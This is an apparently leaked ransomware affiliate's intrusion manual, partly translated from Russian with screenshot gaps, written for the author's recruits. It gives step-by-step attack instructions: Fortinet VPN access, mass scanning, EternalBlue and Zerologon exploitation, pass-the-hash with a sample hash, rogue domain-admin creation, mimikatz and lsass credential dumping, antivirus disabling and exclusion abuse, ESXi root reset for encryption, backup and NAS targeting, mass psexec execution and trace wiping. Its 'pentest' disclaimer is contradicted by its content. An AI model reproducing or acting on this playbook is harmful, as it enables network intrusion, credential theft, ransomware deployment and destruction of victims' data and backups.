2021-08-31 - Bassterlord (FishEye) Networking Manual (X)
2021-08-31 - Bassterlord (FishEye) Networking Manual (X)
Manual
Foreward
But above all, for people who will work for me.
2. VPN (link) — it is best to use this on the main machine (not on the virtual
machine )
4. Any Windows 10
5. Nmap (link)
6. Mimikaz (link)
7. GMER (link)
8. Scanner (link) — Only use the paid on a virtual machine, do not put on
pwned/broken (?пробитые) computers (there will be a free crack next to the
archive)
9. Pysecdump (link)
15. Bluekeep exploit for 3389 under Windows (located next to it in the archive)
Main machine
Virtualbox
Metasploit
Mimikatz
Psexec
Procdump
Pysecdump
Standard log and pass Fortinet VPN
kali - kali Scanner
Fortinet VPN deb Powertool
IMPACKET Gmer
IMPACKET
Zerologon
exploit
NMAP
TOX
Bluekeep
exploit
Installing software in Kali
Enter the kali password and click enter (passwords in kali are not displayed in
the console, you must enter it blindly)
Next, input
cd impacket
install everything according to the list from the screen with all the default
settings.
Enter commands:
cd c:\impacket
cve-2020-1472-exploit.py
Install everything else as default and copy the software to the desktop.
Collecting material and how to get it
For extracting material for work, go to the service
http://masscan.online/ru
Buy an account of your choice and scan the whole world for popular
HTTPS ports, example below:
Go to Kali
cd Fortigate
This will be our material for work, copy our output to the VM with Windows
and look at the next section.
RANSOMWARE = Terrorism
You will perform all your actions at your own
peril and risk.
However, the risk is for millions!
I'm not promoting ransoms, it's just a pentest
manual.
Beginning of work/job
First, go to the VM under Windows and Open Fortinet VPN
client
Configure VPN
Something like the following picture will appear. Pay attention to the
interface and netmask:
10.102.96.0 — 255.255.255.0
This means that you will register it in the scanner this way:
10.102.96.0 — 10.102.96.255
10.102.0.0 — 255.255.0.0
10.102.0.0 — 10.102.255.255
If we see
0.0.0.0 — 0.0.0.0
192.168.0.0 — 192.168.255.255
Open the Softperfect scanner and enter the resulting ranges.
Here we will enter the logins and passwords from our VPN
If you are using the paid version of the scanner then you will have a
Our task is to sort the results by workgroup and TCP ports. And check
for the presence of red C $ disks in pluses under the IP address column
Also do not forget that if you have a paid version of the scanner,
you'll need some alternative settings
Ports and their correspondences with services
General:135,137,139,445,8080,80,443
DB mysql,mssql,db2,postgresql:3306,1433,50000,5432,5433 -Database
Oracle: 1521,1522
Iscsi: 860,3260
replication: 902,31031,8123,8043,5480,5722
In the far right column after the scan, we will see vulnerable devices
for the Eternal Blue vulnerability (MS-17-010) .
Next, we will look at the exploitation of this vulnerability in detail.
MS-17-010 (Eternal Blue)
To exploit the vulnerability, you will need Metasploit
exploit
exploit
Next, we wait for the completion of the process and watch active
sessions meterpreter-a
The sessions command displays a list of computers by numbering that
the exploit managed to break through
getsystem
load kiwi
domain
If there are red disks everywhere in the domain, this means that we
have received the administrator's domain on the network and we
have rights to read and change data everywhere on the remote
machine.
If only on several machine, it means only the rights of local
administrators and it is worth looking for other accounts.
If we do not have open passwords but only hashes that could not be
decrypted, we will consider the hash login vulnerabilities in the PASS
THE HASH attacks section.
If the open computer with the red C$ drive does not have port 3389,
you can use the psexec tool, which we will go over in a separate
section.
Using the following parameters and comparing the IP sessions, it can
be determined whether we accessed the server through the
vulnerability.
shell
net group
This will help us find out the accounts of domain administrators and
accordingly, is not cluttered with ordinary users and their accounts.
Also, put a .cmd file on the desktop with the following content:
We will rewrite it and launch it for the purposes we need on the network.
Делаем сортировку по аккаунтам пользователей и подставляем нужные
нам значения до первой точки как на скриншоте ниже
Save the Zerologon.cmd file and run it again, it all depends on whether the
server is patched against this vulnerability or not.
We repeat this action on all DCs in turn until we get a positive result:
If the 'Performing authentication attempts' line takes more than 4 minutes or
gives a negative result, go to the next DC or use other vulnerabilities if none of
the DCs are vulnerable.
cd impacket/examples
Press enter, it will ask to enter the password, enter 'kali' (it won't show up) and
press enter
If we decrypt the password, we boldly break into all computers with these
creds, not forgetting to substitute an example for the working group:
If we do not receive the password we need to use the Pass The Hash attack.
Pass The Hash
So we have hashes, but we could not get the password from the admin account.
Return to Kali.
input cd impacket/examples
sudo python3 smbexec.py -hashes
aad3b435b51404eeaad3b435b51404ee:48b3420f6a0f7ae1fb29104b213154ee
Administrator@192.168.16.27
or
If we break "High Profile" we can immediately create our own domain admin (?
Original: Если ломимся по «Громкому» можем создать сразу своего домен админа )
After that, we get our account with domain administrator rights and, accordingly, we can
break into all the machines on the domain using that account:
support Pa$$wo0rd
Next, go to the DC and remove the creds of the domain admin with mimikatz 64.exe or
32.exe. Commands:
Gmer
PowerTool
A computer\HKEY_LOCAL_MACHINE\SOFTWARE
Look at all the subfolders that are in the folder with AV, our goal is to find the
folders and values inside them with the name 'Exclusions'.
С:\users\admin\java.exe
Rename malware to java.exe and throw it on this path, if there is no such path
or folders on this machine, create 1-in-1 folders as indicated in the exceptions
and try to run our file.
If nothing comes out of the above, we stomp on all machines in the domain on
port 3389 from the scanner and see if the AV is installed there.
If AV is not installed on several machines, you can put a portable softperfect
scanner there, scan the network from the inside, mount the disks and run our
h*cker, sorry choked =D
Ideally, you need to kill AV wherever possible and add C:\ drives to the
exceptions
And for computers that don't have port 3389, including NAS storages, mount
and only then start lkh k yes what is that =D
NAS and Backups
The hardest part :)
5000,5001
and backups
Veeam: 9443,9392,9393,9401,6160
Usually, we hang out outside the domain, first of all we look at the scan if we
now have access to them from a regular scan with the domain admin accounts
However, if we are in the workgroup, you can break through all the domain
administrators and try to log into them using creds without a domain from the
pwned accounts. This is done through the web interface by opening the NAS IP
through the browser and specifying the NAS port separated by a colon.
Log in as Admin with the same password, or try password from other domain
admins, the probability of breaking through increases.
Sometimes when scanning NAS through Softperfect, accounts are displayed that
are active in the repository, usually this:
If we opened the network through PASS THE HASH, look for these accounts in
the results of the received hashes and get passwords from them through the
hash cracking service.
And the most important thing at the Hacker stage, we need to start with disks
and computers where the most memory is from 500 gigs and more.
In my work, I often face the task of resetting the root password on esx.
That is, you reset the password and encrypt it right away.
This method is consists of entering esx into the domain and then we will be able
to log in using the credentials of the domain administrator.
Then create a global ESX Admins group there, be sure to include our domain
admin there.
Select the esx host, press configure - Authentication Service - Join domain
Enter the domain in the format domain.local or domain.com, which domain can
be found by entering systeminfo on the computer in the domain.
Enter the login of the domain administrator without a domain and password.
Now everything is ready for authorization, go to the esx host using the domain
admin credentials and reset the root pass.
Then you just go to esx via ssh
First of all, it will help us run any file on all machines to which we have
access.
text editor with IP addresses the account of the domain password from domain
of the computers on which the file to run
admin together with the admin
we run the file domain
If you removed all AVs, added exceptions and did everything right, this exe
will run on all computers.
If you need to run the file on behalf of the system, add the file.exe to the
parameters -s -d -c
Through Psexec, you can get and remove creds from remote computers if they
do not have port 3389 but we have an account.
and procdump.exe
cd C:\
pysecdump.exe -s
This command will give us the admin hashes on the remote computer, we are
trying to break through the site or use PASS THE HASH in Kali or other
machines.
Next, we do
If successful, an lsass.dmp file will be created on the remote machine on the C:\
drive.
sekurlsa::minidump lsass.dmp
privilege::debug
log 1234.txt
sekurlsa::logonPasswords full
Next, you can try to remotely enable the rdp port with the command
Do not forget to delete all files and traces of work on the remote machine.
After all the actions, if you want to wipe the traces of your stay to a
minimum and postpone the break-in
On the machines that you entered using RDP, you can open powershell and
Create a listener.